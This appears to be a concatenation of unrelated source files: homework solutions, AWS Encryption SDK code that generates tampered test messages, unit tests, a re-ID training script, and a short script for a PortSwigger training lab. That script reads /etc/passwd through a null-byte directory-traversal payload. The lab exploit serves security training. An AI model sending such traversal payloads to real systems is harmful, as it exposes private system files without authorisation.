"*** YOUR CODE HERE ***"
# result, k = 0, 1
# while k <= n:
# result, k = result + f(k), k + 1
return accumulate(add,0,n,f)
def product_using_accumulate(n, f):
"""An implementation of product using accumulate.
>>> product_using_accumulate(4, square)
576
>>> product_using_accumulate(6, triple)
524880
>>> from construct_check import check
>>> # ban iteration and recursion
>>> check(HW_SOURCE_FILE, 'product_using_accumulate',
... ['Recursion', 'For', 'While'])
True
"""
"*** YOUR CODE HERE ***"
# result, k = 1, 1
# while k <= n:
# result, k = result * f(k), k + 1
return accumulate(mul,1,n,f)
def compose1(h, g):
"""Return a function f, such that f(x) = h(g(x))."""
def f(x):
return h(g(x))
return f
def make_repeater(h, n):
"""Return the function that computes the nth application of h.
>>> add_three = make_repeater(increment, 3)
>>> add_three(5)
8
>>> make_repeater(triple, 5)(1) # 3 * 3 * 3 * 3 * 3 * 1
243
>>> make_repeater(square, 2)(5) # square(square(5))
625
>>> make_repeater(square, 4)(5) # square(square(square(square(5))))
152587890625
>>> make_repeater(square, 0)(5) # Yes, it makes sense to apply the function zero times!
5
"""
"*** YOUR CODE HERE ***"
def repeater(x):
result, k = x,1
while k <= n:
result,k = h(result), k + 1
return result
return repeater
##########################
# Just for fun Questions #
##########################
def zero(f):
return lambda x: x
def successor(n):
return lambda f: lambda x: f(n(f)(x))
def one(f):
"""Church numeral 1: same as successor(zero)"""
"*** YOUR CODE HERE ***"
return lambda x: f(x)
def two(f):
"""Church numeral 2: same as successor(successor(zero))"""
"*** YOUR CODE HERE ***"
return lambda x: f(f(x))
three = successor(two)
def church_to_int(n):
"""Convert the Church numeral n to a Python integer.
>>> church_to_int(zero)
0
>>> church_to_int(one)
1
>>> church_to_int(two)
2
>>> church_to_int(three)
3
"""
"*** YOUR CODE HERE ***"
return n(lambda x: x + 1)(0)
def add_church(m, n):
"""Return the Church numeral for m + n, for Church numerals m and n.
>>> church_to_int(add_church(two, three))
5
"""
"*** YOUR CODE HERE ***"
return lambda f: lambda x: m(f)(n(f)(x))
def mul_church(m, n):
"""Return the Church numeral for m * n, for Church numerals m and n.
>>> four = successor(three)
>>> church_to_int(mul_church(two, three))
6
>>> church_to_int(mul_church(three, four))
12
"""
"*** YOUR CODE HERE ***"
return lambda f: m(n(f))
def pow_church(m, n):
"""Return the Church numeral m ** n, for Church numerals m and n.
>>> church_to_int(pow_church(two, three))
8
>>> church_to_int(pow_church(three, two))
9
"""
"*** YOUR CODE HERE ***"
return n(m)
| 4.5625 | 5 |
test_vector_handlers/src/awses_test_vectors/manifests/full_message/decrypt_generation.py | farleyb-amazon/aws-encryption-sdk-python | 95 | 1251 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""
AWS Encryption SDK Decrypt Message Generation manifest handler.
Described in AWS Crypto Tools Test Vector Framework feature #0006 AWS Encryption SDK Decrypt Message Generation.
"""
import json
import os
import uuid
from copy import copy
import attr
import six
from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache
from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager
from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager
from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager
from awses_test_vectors.internal.defaults import ENCODING
from awses_test_vectors.internal.util import (
dictionary_validator,
file_reader,
file_writer,
iterable_validator,
membership_validator,
validate_manifest_type,
)
from awses_test_vectors.manifests.full_message.decrypt import (
DecryptionMethod,
MessageDecryptionManifest,
MessageDecryptionTestResult,
MessageDecryptionTestScenario,
)
from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario
from awses_test_vectors.manifests.keys import KeysManifest
try:
from aws_encryption_sdk.identifiers import AlgorithmSuite
except ImportError:
from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite
from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs
try: # Python 3.5.0 and 3.5.1 have incompatible typing modules
from typing import IO, Callable, Dict, Iterable, Optional # noqa pylint: disable=unused-import
from awses_test_vectors.internal.mypy_types import ( # noqa pylint: disable=unused-import
ENCRYPT_SCENARIO_SPEC,
PLAINTEXTS_SPEC,
)
except ImportError: # pragma: no cover
# We only actually need these imports when running the mypy checks
pass
SUPPORTED_VERSIONS = (2,)
class TamperingMethod:
"""Base class for all tampering methods."""
@classmethod
def from_tampering_spec(cls, spec):
"""Load from a tampering specification"""
if spec is None:
return TamperingMethod()
if spec == "truncate":
return TruncateTamperingMethod()
if spec == "mutate":
return MutateTamperingMethod()
if spec == "half-sign":
return HalfSigningTamperingMethod()
((tampering_tag, tampering_values_spec),) = spec.items()
if tampering_tag == "change-edk-provider-info":
return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec)
raise ValueError("Unrecognized tampering method tag: " + tampering_tag)
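    # Illustrative spec values accepted by from_tampering_spec above (inferred only from
    # the branches in this method, not from any external documentation):
    #   "truncate", "mutate", "half-sign",
    #   or {"change-edk-provider-info": ["new-provider-info-1", "new-provider-info-2"]}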
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs
"""
materials_manager = DefaultCryptoMaterialsManager(
generation_scenario.encryption_scenario.master_key_provider_fn()
)
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager)
if generation_scenario.result:
expected_result = generation_scenario.result
else:
expected_result = MessageDecryptionTestResult.expect_output(
plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext
)
return [
generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)
]
class ChangeEDKProviderInfoTamperingMethod(TamperingMethod):
"""Tampering method that changes the provider info on all EDKs."""
new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types))
def __init__(self, new_provider_infos):
"""Create a new instance for a given new provider info value."""
self.new_provider_infos = new_provider_infos
@classmethod
def from_values_spec(cls, values_spec):
"""Load from a tampering parameters specification"""
return ChangeEDKProviderInfoTamperingMethod(values_spec)
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs.
"""
master_key_provider = generation_scenario.encryption_scenario.master_key_provider_fn()
# Use a caching CMM to avoid generating a new data key every time.
cache = LocalCryptoMaterialsCache(10)
caching_cmm = CachingCryptoMaterialsManager(
master_key_provider=master_key_provider,
cache=cache,
max_age=60.0,
max_messages_encrypted=100,
)
return [
self.run_scenario_with_new_provider_info(
ciphertext_writer, generation_scenario, caching_cmm, new_provider_info
)
for new_provider_info in self.new_provider_infos
]
def run_scenario_with_new_provider_info(
self, ciphertext_writer, generation_scenario, materials_manager, new_provider_info
):
"""Run with tampering for a specific new provider info value"""
tampering_materials_manager = ProviderInfoChangingCryptoMaterialsManager(materials_manager, new_provider_info)
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)
expected_result = MessageDecryptionTestResult.expect_error(
"Incorrect encrypted data key provider info: " + new_provider_info
)
return generation_scenario.decryption_test_scenario_pair(
ciphertext_writer, ciphertext_to_decrypt, expected_result
)
class ProviderInfoChangingCryptoMaterialsManager(CryptoMaterialsManager):
"""
    Custom CMM that modifies the provider info field on EDKs.
THIS IS ONLY USED TO CREATE INVALID MESSAGES and should never be used in
production!
"""
wrapped_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))
new_provider_info = attr.ib(validator=attr.validators.instance_of(six.string_types))
def __init__(self, materials_manager, new_provider_info):
"""Create a new CMM that wraps a the given CMM."""
self.wrapped_cmm = materials_manager
self.new_provider_info = new_provider_info
def get_encryption_materials(self, request):
"""
Request materials from the wrapped CMM, and then change the provider info
on each EDK.
"""
result = self.wrapped_cmm.get_encryption_materials(request)
for encrypted_data_key in result.encrypted_data_keys:
encrypted_data_key.key_provider.key_info = self.new_provider_info
return result
def decrypt_materials(self, request):
"""Thunks to the wrapped CMM"""
return self.wrapped_cmm.decrypt_materials(request)
BITS_PER_BYTE = 8
class TruncateTamperingMethod(TamperingMethod):
"""Tampering method that truncates a good message at every byte (except zero)."""
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs.
"""
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()
        return [
            generation_scenario.decryption_test_scenario_pair(
                ciphertext_writer,
                ciphertext_to_decrypt[0:length],
                MessageDecryptionTestResult.expect_error("Truncated at byte {}".format(length)),
            )
            for length in range(1, len(ciphertext_to_decrypt))
        ]
class MutateTamperingMethod(TamperingMethod):
"""Tampering method that produces a message with a single bit flipped, for every possible bit."""
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs.
"""
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run()
        return [
            generation_scenario.decryption_test_scenario_pair(
                ciphertext_writer,
                MutateTamperingMethod.flip_bit(ciphertext_to_decrypt, bit),
                MessageDecryptionTestResult.expect_error("Bit {} flipped".format(bit)),
            )
            for bit in range(0, len(ciphertext_to_decrypt) * BITS_PER_BYTE)
        ]
    @classmethod
    def flip_bit(cls, ciphertext, bit):
        """Flip only the given bit in the given ciphertext"""
        byte_index, bit_index = divmod(bit, BITS_PER_BYTE)
        result = bytearray(ciphertext)
        result[byte_index] ^= 1 << (BITS_PER_BYTE - bit_index - 1)
        return bytes(result)
class HalfSigningTamperingMethod(TamperingMethod):
"""Tampering method that changes the provider info on all EDKs."""
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, _plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs.
"""
tampering_materials_manager = HalfSigningCryptoMaterialsManager(
generation_scenario.encryption_scenario.master_key_provider_fn()
)
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(tampering_materials_manager)
expected_result = MessageDecryptionTestResult.expect_error(
"Unsigned message using a data key with a public key"
)
return [
generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)
]
class HalfSigningCryptoMaterialsManager(CryptoMaterialsManager):
"""
Custom CMM that generates materials for an unsigned algorithm suite
that includes the "aws-crypto-public-key" encryption context.
THIS IS ONLY USED TO CREATE INVALID MESSAGES and should never be used in
production! It is imitating what a malicious decryptor without encryption
permissions might do, to attempt to forge an unsigned message from a decrypted
signed message, and therefore this is an important case for ESDKs to reject.
"""
wrapped_default_cmm = attr.ib(validator=attr.validators.instance_of(CryptoMaterialsManager))
def __init__(self, master_key_provider):
"""
Create a new CMM that wraps a new DefaultCryptoMaterialsManager
based on the given master key provider.
"""
self.wrapped_default_cmm = DefaultCryptoMaterialsManager(master_key_provider)
def get_encryption_materials(self, request):
"""
Generate half-signing materials by requesting signing materials
from the wrapped default CMM, and then changing the algorithm suite
        and removing the signing key from the result.
"""
if request.algorithm == AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY:
signing_request = copy(request)
signing_request.algorithm = AlgorithmSuite.AES_256_GCM_HKDF_SHA512_COMMIT_KEY_ECDSA_P384
result = self.wrapped_default_cmm.get_encryption_materials(signing_request)
result.algorithm = request.algorithm
result.signing_key = None
return result
raise NotImplementedError(
"The half-sign tampering method is only supported on the "
"AES_256_GCM_HKDF_SHA512_COMMIT_KEY algorithm suite."
)
def decrypt_materials(self, request):
"""Thunks to the wrapped default CMM"""
return self.wrapped_default_cmm.decrypt_materials(request)
@attr.s
class MessageDecryptionTestScenarioGenerator(object):
# pylint: disable=too-many-instance-attributes
"""Data class for a single full message decrypt test scenario.
Handles serialization and deserialization to and from manifest specs.
:param MessageEncryptionTestScenario encryption_scenario: Encryption parameters
:param tampering_method: Optional method used to tamper with the ciphertext
:type tampering_method: :class:`TamperingMethod`
:param decryption_method:
:param decryption_master_key_specs: Iterable of master key specifications
:type decryption_master_key_specs: iterable of :class:`MasterKeySpec`
:param Callable decryption_master_key_provider_fn:
:param result:
"""
encryption_scenario = attr.ib(validator=attr.validators.instance_of(MessageEncryptionTestScenario))
tampering_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(TamperingMethod)))
decryption_method = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(DecryptionMethod)))
decryption_master_key_specs = attr.ib(validator=iterable_validator(list, MasterKeySpec))
decryption_master_key_provider_fn = attr.ib(validator=attr.validators.is_callable())
result = attr.ib(validator=attr.validators.optional(attr.validators.instance_of(MessageDecryptionTestResult)))
@classmethod
def from_scenario(cls, scenario, keys, plaintexts):
"""Load from a scenario specification.
:param dict scenario: Scenario specification JSON
:param KeysManifest keys: Loaded keys
:param dict plaintexts: Mapping of plaintext names to plaintext values
:return: Loaded test scenario
:rtype: MessageDecryptionTestScenarioGenerator
"""
encryption_scenario_spec = scenario["encryption-scenario"]
encryption_scenario = MessageEncryptionTestScenario.from_scenario(encryption_scenario_spec, keys, plaintexts)
tampering = scenario.get("tampering")
tampering_method = TamperingMethod.from_tampering_spec(tampering)
decryption_method_spec = scenario.get("decryption-method")
decryption_method = DecryptionMethod(decryption_method_spec) if decryption_method_spec else None
if "decryption-master-keys" in scenario:
decryption_master_key_specs = [
MasterKeySpec.from_scenario(spec) for spec in scenario["decryption-master-keys"]
]
def decryption_master_key_provider_fn():
return master_key_provider_from_master_key_specs(keys, decryption_master_key_specs)
else:
decryption_master_key_specs = encryption_scenario.master_key_specs
decryption_master_key_provider_fn = encryption_scenario.master_key_provider_fn
result_spec = scenario.get("result")
result = MessageDecryptionTestResult.from_result_spec(result_spec, None) if result_spec else None
return cls(
encryption_scenario=encryption_scenario,
tampering_method=tampering_method,
decryption_method=decryption_method,
decryption_master_key_specs=decryption_master_key_specs,
decryption_master_key_provider_fn=decryption_master_key_provider_fn,
result=result,
)
def run(self, ciphertext_writer, plaintext_uri):
"""Run this scenario, writing the resulting ciphertext with ``ciphertext_writer`` and returning
a :class:`MessageDecryptionTestScenario` that describes the matching decrypt scenario.
:param callable ciphertext_writer: Callable that will write the requested named ciphertext and
return a URI locating the written data
:param str plaintext_uri: URI locating the written plaintext data for this scenario
:return: Decrypt test scenario that describes the generated scenario
:rtype: MessageDecryptionTestScenario
"""
return dict(self.tampering_method.run_scenario_with_tampering(ciphertext_writer, self, plaintext_uri))
def decryption_test_scenario_pair(self, ciphertext_writer, ciphertext_to_decrypt, expected_result):
"""Create a new (name, decryption scenario) pair"""
ciphertext_name = str(uuid.uuid4())
ciphertext_uri = ciphertext_writer(ciphertext_name, ciphertext_to_decrypt)
return (
ciphertext_name,
MessageDecryptionTestScenario(
ciphertext_uri=ciphertext_uri,
ciphertext=ciphertext_to_decrypt,
master_key_specs=self.decryption_master_key_specs,
master_key_provider_fn=self.decryption_master_key_provider_fn,
decryption_method=self.decryption_method,
result=expected_result,
),
)
@attr.s
class MessageDecryptionGenerationManifest(object):
"""AWS Encryption SDK Decryption Message Generation manifest handler.
Described in AWS Crypto Tools Test Vector Framework feature #0006 AWS Encryption SDK Decrypt Message Generation.
:param int version: Version of this manifest
:param KeysManifest keys: Loaded keys
:param dict plaintexts: Mapping of plaintext names to plaintext values
:param dict tests: Mapping of test scenario names to :class:`MessageDecryptionGenerationManifest`s
"""
version = attr.ib(validator=membership_validator(SUPPORTED_VERSIONS))
keys = attr.ib(validator=attr.validators.instance_of(KeysManifest))
plaintexts = attr.ib(validator=dictionary_validator(six.string_types, six.binary_type))
tests = attr.ib(validator=dictionary_validator(six.string_types, MessageDecryptionTestScenarioGenerator))
type_name = "awses-decrypt-generate"
@staticmethod
def _generate_plaintexts(plaintexts_specs):
# type: (PLAINTEXTS_SPEC) -> Dict[str, bytes]
"""Generate required plaintext values.
:param dict plaintexts_specs: Mapping of plaintext name to size in bytes
:return: Mapping of plaintext name to randomly generated bytes
:rtype: dict
"""
return {name: os.urandom(size) for name, size in plaintexts_specs.items()}
@classmethod
def from_file(cls, input_file):
# type: (IO) -> MessageDecryptionGenerationManifest
"""Load from a file containing a full message encrypt manifest.
:param file input_file: File object for file containing JSON manifest
:return: Loaded manifest
:rtype: MessageEncryptionManifest
"""
raw_manifest = json.load(input_file)
validate_manifest_type(
type_name=cls.type_name, manifest_version=raw_manifest["manifest"], supported_versions=SUPPORTED_VERSIONS
)
parent_dir = os.path.abspath(os.path.dirname(input_file.name))
reader = file_reader(parent_dir)
raw_keys_manifest = json.loads(reader(raw_manifest["keys"]).decode(ENCODING))
keys = KeysManifest.from_manifest_spec(raw_keys_manifest)
plaintexts = cls._generate_plaintexts(raw_manifest["plaintexts"])
tests = {}
for name, scenario in raw_manifest["tests"].items():
try:
tests[name] = MessageDecryptionTestScenarioGenerator.from_scenario(
scenario=scenario, keys=keys, plaintexts=plaintexts
)
except NotImplementedError:
continue
return cls(version=raw_manifest["manifest"]["version"], keys=keys, plaintexts=plaintexts, tests=tests)
def run_and_write_to_dir(self, target_directory, json_indent=None):
# type: (str, Optional[int]) -> None
"""Process all known encrypt test scenarios and write the resulting data and manifests to disk.
:param str target_directory: Directory in which to write all output
:param int json_indent: Number of spaces to indent JSON files (optional: default is to write minified)
"""
root_dir = os.path.abspath(target_directory)
root_writer = file_writer(root_dir)
root_writer("keys.json", json.dumps(self.keys.manifest_spec, indent=json_indent).encode(ENCODING))
plaintext_writer = file_writer(os.path.join(root_dir, "plaintexts"))
plaintext_uris = {name: plaintext_writer(name, plaintext) for name, plaintext in self.plaintexts.items()}
ciphertext_writer = file_writer(os.path.join(root_dir, "ciphertexts"))
test_scenarios = {
decrypt_scenario_name: decrypt_scenario
for name, scenario in self.tests.items()
for decrypt_scenario_name, decrypt_scenario in scenario.run(
ciphertext_writer, plaintext_uris[scenario.encryption_scenario.plaintext_name]
).items()
}
decrypt_manifest = MessageDecryptionManifest(
keys_uri="file://keys.json", keys=self.keys, test_scenarios=test_scenarios
)
root_writer("manifest.json", json.dumps(decrypt_manifest.manifest_spec, indent=json_indent).encode(ENCODING))
| 1.554688 | 2 |
acceptance/test/TestStartStopFeature.py | ismacaulay/qtcwatchdog | 0 | 1252 | from acceptance.harness.acceptance_test import WatchdogAcceptanceTest
class TestStartStopFeature(WatchdogAcceptanceTest):
def test_willStartObserverWhenWatchdogStarted(self):
self.create_and_start_watchdog()
self.assertTrue(self.fs_observer.running)
def test_willStopObserverWhenWatchdogStopped(self):
self.create_and_start_watchdog()
self.watchdog.stop()
self.assertFalse(self.fs_observer.running)
def test_willJoinObserverThreadWhenWatchdogStopped(self):
self.create_and_start_watchdog()
self.watchdog.stop()
self.assertTrue(self.fs_observer.joined)
| 2.03125 | 2 |
neural_spline_flows/nde/transforms/transform_test.py | VincentStimper/nsf | 0 | 1253 | import torch
import torchtestcase
from neural_spline_flows.nde.transforms import base
class TransformTest(torchtestcase.TorchTestCase):
"""Base test for all transforms."""
def assert_tensor_is_good(self, tensor, shape=None):
self.assertIsInstance(tensor, torch.Tensor)
self.assertFalse(torch.isnan(tensor).any())
self.assertFalse(torch.isinf(tensor).any())
if shape is not None:
self.assertEqual(tensor.shape, torch.Size(shape))
def assert_forward_inverse_are_consistent(self, transform, inputs):
inverse = base.InverseTransform(transform)
identity = base.CompositeTransform([inverse, transform])
outputs, logabsdet = identity(inputs)
self.assert_tensor_is_good(outputs, shape=inputs.shape)
self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1])
self.assertEqual(outputs, inputs)
self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1]))
def assertNotEqual(self, first, second, msg=None):
if ((self._eps and (first - second).abs().max().item() < self._eps) or
(not self._eps and torch.equal(first, second))):
self._fail_with_message(msg, "The tensors are _not_ different!")
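# Minimal usage sketch (an assumption about how subclasses exercise this base class;
# "MyTransform" is a placeholder, not part of this module):
#
#   class MyTransformTest(TransformTest):
#       def test_forward_inverse(self):
#           transform = MyTransform(features=5)
#           inputs = torch.randn(8, 5)
#           self.assert_forward_inverse_are_consistent(transform, inputs)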
| 2.546875 | 3 |
directory-traversal/validate-file-extension-null-byte-bypass.py | brandonaltermatt/penetration-testing-scripts | 0 | 1254 | <filename>directory-traversal/validate-file-extension-null-byte-bypass.py
"""
https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass
"""
import sys
import requests
site = sys.argv[1]
if site.startswith('https://'):
    site = site.rstrip('/')[len('https://'):]
url = f'''https://{site}/image?filename=../../../etc/passwd%00.png'''
s = requests.Session()
resp = s.get(url)
print(resp.text) | 2.859375 | 3 |
atmpro1_vsm2.py | joselynzhao/One-shot-Person-Re-ID-ATM | 3 | 1255 | <reponame>joselynzhao/One-shot-Person-Re-ID-ATM<gh_stars>1-10
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @Time : 2020/9/3 11:03 AM
# @Author : Joselynzhao
# @Email : <EMAIL>
# @File : atmpro1_vsm2.py
# @Software: PyCharm
# @Desc :
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @Time : 2020/9/1 7:07 PM
# @Author : Joselynzhao
# @Email : <EMAIL>
# @File : atmpro1_vsm.py
# @Software: PyCharm
# @Desc :
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
# @Time : 2020/8/26 8:26 PM
# @Author : Joselynzhao
# @Email : <EMAIL>
# @File : atmpro1.py
# @Software: PyCharm
# @Desc :
from my_reid.eug import *
from my_reid import datasets
from my_reid import models
import numpy as np
import torch
import argparse
import os
import warnings
warnings.filterwarnings("ignore")
from my_reid.utils.logging import Logger
import os.path as osp
import sys
from torch.backends import cudnn
from my_reid.utils.serialization import load_checkpoint
from torch import nn
import time
import pickle
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.distributed import DistributedSampler
from pathlib import Path
def resume(savepath):
import re
pattern = re.compile(r'step_(\d+)\.ckpt')
start_step = -1
ckpt_file = ""
# find start step
files = os.listdir(savepath)
files.sort()
for filename in files:
try:
iter_ = int(pattern.search(filename).groups()[0])
print(iter_)
if iter_ > start_step:
start_step = iter_
ckpt_file = osp.join(savepath, filename)
except:
continue
# if need resume
if start_step >= 0:
print("continued from iter step", start_step)
else:
print("resume failed", start_step, files)
return start_step, ckpt_file
def main(args):
father = Path('/mnt/')
    if father.exists(): # running on the server
        data_dir = Path('/mnt/share/datasets/RE-ID/data') # server
        logs_dir = Path('/mnt/home/{}'.format(args.log_name)) # server
    else: # local machine
        data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') # use this when running locally
        logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # use this when running locally
    cudnn.benchmark = True
    cudnn.enabled = True
    save_path = os.path.join(logs_dir, args.dataset, args.exp_name, args.exp_order) # path down to the experiment number.
    total_step = 100 // args.EF + 1
    sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(".%m_%d_%H:%M:%S") + '.txt'))
    dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a') # save performance data (performance in the feature space).
    data_file = open(osp.join(save_path, 'data.txt'), 'a') # save performance data (performance in the feature space).
    kf_file = open(osp.join(save_path,'kf.txt'),'a')
    # data format: label_pre_r, select_pre_r, label_pre_t, select_pre_t, plus the tagper results.
    tagper_path = osp.join(save_path,'tagper') # tagper checkpoint directory.
if not Path(tagper_path).exists():
os.mkdir(tagper_path)
    '''Record the configuration info and paths'''
print('-'*20+'config_info'+'-'*20)
config_file = open(osp.join(save_path, 'config.txt'), 'w')
config_info = str(args).split('(')[1].strip(')').split(',')
config_info.sort()
for one in config_info:
key,value=map(str,one.split('='))
config_file.write(key.strip()+'='+value.strip('\'')+'\n')
print(key.strip()+'='+value.strip('\''))
config_file.write('save_path='+save_path)
print('save_path='+save_path)
print('-' * 20 + 'config_info' + '-' * 20)
config_file.close()
    train_time_file = open(osp.join(save_path, 'time.txt'), 'a') # records only the time spent training.
    # data format: step_time total_time.
total_time = 0
# get all the labeled and unlabeled data for training
dataset_all = datasets.create(args.dataset, osp.join(data_dir, args.dataset))
num_all_examples = len(dataset_all.train)
l_data, u_data = get_init_shot_in_cam1(dataset_all,
load_path="./examples/{}_init_{}.pickle".format(dataset_all.name, args.init),
init=args.init)
resume_step, ckpt_file = -1, ''
if args.resume:
resume_step, ckpt_file = resume(save_path)
# initial the EUG algorithm
eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,
dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames,
embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda)
tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,
dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path,
max_frames=args.max_frames,
embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda)
new_train_data = l_data
unselected_data = u_data
    iter_mode = 2 # iteration mode: decides whether the tagper is trained
for step in range(total_step):
# for resume
if step < resume_step:
continue
ratio = (step + 1) * args.EF / 100
ratio_t = (step+1+args.t) * args.EF /100
nums_to_select = int(len(u_data) * ratio)
nums_to_select_tagper = int(len(u_data) * ratio_t)
if nums_to_select >= len(u_data):
break
        # decay args.vsm_lambda from 0.5 to 0
vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda
vsm_lambda +=1
print("Runing: EF={}%, step {}:\t Nums_to_be_select {} \t Ritio \t Logs-dir {}".format(
args.EF, step, nums_to_select, ratio, save_path))
# train the model or load ckpt
start_time = time.time()
print("training reid model")
eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size,
init_lr=0.1) if step != resume_step else eug.resume(ckpt_file, step)
        # evaluate only the eug model
        # mAP, rank1, rank5, rank10, rank20 = 0, 0, 0, 0, 0
        mAP, rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery)
        # write the metrics to the data file.
        data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\n'.format(step, mAP, rank1, rank5, rank10, rank20))
        pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm()
        selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data))) # sample straight at the doubled (tagper) ratio; keep 50 samples back so unselected_data is never empty
new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y)
raw_label_pre, raw_select_pre = label_pre,select_pre
t_label_pre,t_select_pre = 0,0
raw_select_pre_t = 0
# label_pre_t,select_pre_t=0,0
if iter_mode==2:
raw_select_pre_t = raw_select_pre
print("training tagper model")
selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data)))
_, _, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y)
# kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre))
tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step)
tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1)
pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm()
            selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # target number of samples to select
new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y)
t_label_pre,t_select_pre = label_pre,select_pre
label_pre,select_pre = t_label_pre,t_select_pre
if nums_to_select_tagper >=len(u_data):
                iter_mode=1 # switch mode
print('tagper is stop')
else: #mode = 1
# raw_select_pre = raw_select_pre_t
# raw_select_pre_t = 0
label_pre,select_pre = raw_label_pre,raw_select_pre
end_time = time.time()
step_time = end_time - start_time
total_time = step_time + total_time
train_time_file.write('{} {:.6} {:.6}\n'.format(step, step_time, total_time))
kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre))
dataf_file.write(
'{} {:.2%} {:.2%}\n'.format(step, label_pre, select_pre))
dataf_file.close()
train_time_file.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID')
parser.add_argument('-d', '--dataset', type=str, default='mars',
choices=datasets.names())
parser.add_argument('-b', '--batch-size', type=int, default=16)
parser.add_argument('-f', '--fea', type=int, default=1024)
parser.add_argument('--EF', type=int, default=10)
    parser.add_argument('--t', type=float, default=2) # no longer the tagper sampling multiplier; it now means how many steps ahead to sample.
parser.add_argument('--exp_order', type=str, default='0')
parser.add_argument('--exp_name', type=str, default='atm')
parser.add_argument('--exp_aim', type=str, default='for paper')
parser.add_argument('--run_file',type=str,default='train.py')
parser.add_argument('--log_name',type=str,default='pl_logs')
parser.add_argument('--topk',type=int,default=2)
parser.add_argument('--vsm_lambda',type=float,default=0.5)
parser.add_argument('--resume', type=str, default='Yes')
parser.add_argument('--max_frames', type=int, default=900)
parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss'])
parser.add_argument('--init', type=float, default=-1)
parser.add_argument('-m', '--momentum', type=float, default=0.5)
